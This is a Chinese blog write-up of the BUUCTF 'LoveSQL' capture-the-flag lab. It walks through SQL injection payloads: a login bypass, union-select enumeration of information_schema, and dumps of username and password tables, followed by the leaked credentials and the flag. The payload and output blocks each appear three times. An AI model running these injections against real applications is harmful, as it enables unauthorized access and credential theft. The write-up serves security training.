[极客大挑战 2019]LoveSQL – buu刷题记录

这群该死的黑客,竟然这么快就找到了我的flag,这次我把它们放在了那个地方,哼哼!

图片[1]-[极客大挑战 2019]LoveSQL – buu刷题记录-安全小天地

遇到sql注入的题目,首先先试试\' \" \') \') \") \") 这几种组合,总有一个可以成功,实在没思路就放sqlmap吧

万能密码尝试是第一步的

1\' or 1=1#
密码随便输入 123121
1\' or 1=1#
密码随便输入 123121
1\' or 1=1# 密码随便输入 123121

居然出来东西了,拿去试试,错误,果然没这么简单

图片[2]-[极客大挑战 2019]LoveSQL – buu刷题记录-安全小天地

还是按常规操作,一步一步来吧

1\' or 1=1
1\' or 1=2
1\' union select 1,2,group_concat(schema_name) from information_schema.schemata#
1\' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\'geek\'#
1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'geekuser\'#
1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.geekuser#
1\' or 1=1
1\' or 1=2
1\' union select 1,2,group_concat(schema_name) from information_schema.schemata#
1\' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\'geek\'#
1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'geekuser\'#
1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.geekuser#
1\' or 1=1 1\' or 1=2 1\' union select 1,2,group_concat(schema_name) from information_schema.schemata# 1\' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\'geek\'# 1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'geekuser\'# 1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.geekuser#

着实没想到,注了半天,又回到原点了,

图片[3]-[极客大挑战 2019]LoveSQL – buu刷题记录-安全小天地

罢了罢了,还有一个数据表l0ve1ysq1 没有查看,再试试吧

1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'l0ve1ysq1\'#
1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.l0ve1ysq1#
1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'l0ve1ysq1\'#
1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.l0ve1ysq1#
1\' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=\'l0ve1ysq1\'# 1\' union select 1,2,group_concat(concat_ws(\'~\',username,password)) from geek.l0ve1ysq1#

这次终于合适了

Your password is \'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~flag{09742a4b-505d-40c3-a1f0-db341b2599cc}\'
Your password is \'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~flag{09742a4b-505d-40c3-a1f0-db341b2599cc}\'
Your password is \'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~flag{09742a4b-505d-40c3-a1f0-db341b2599cc}\'

最终flag为flag{09742a4b-505d-40c3-a1f0-db341b2599cc}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞7 分享
Everyone has its disadvantage just like the god bites the apple. the bigger disadvantage you have, the more the god appreciate it.
每个人都会有缺陷,就像被上帝咬过的苹果,有的人缺陷比较大,正是因为上帝特别喜欢他的芬芳
评论 抢沙发

请登录后发表评论

    暂无评论内容